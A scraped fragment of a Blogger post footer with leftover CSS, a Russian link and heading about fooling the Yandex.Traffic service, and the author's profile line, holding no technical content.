padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; border-image: initial; font: inherit; vertical-align: baseline; outline-width: 0px; outline-style: initial; outline-color: initial; color: rgb(163, 163, 163); ">Яндекс Пробки. А туда ли Вы едeте?</a></div><div><br /></div><div>Обманываем Яндекс.Пробки.</div><div><br /></div><div><br /></div>Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com0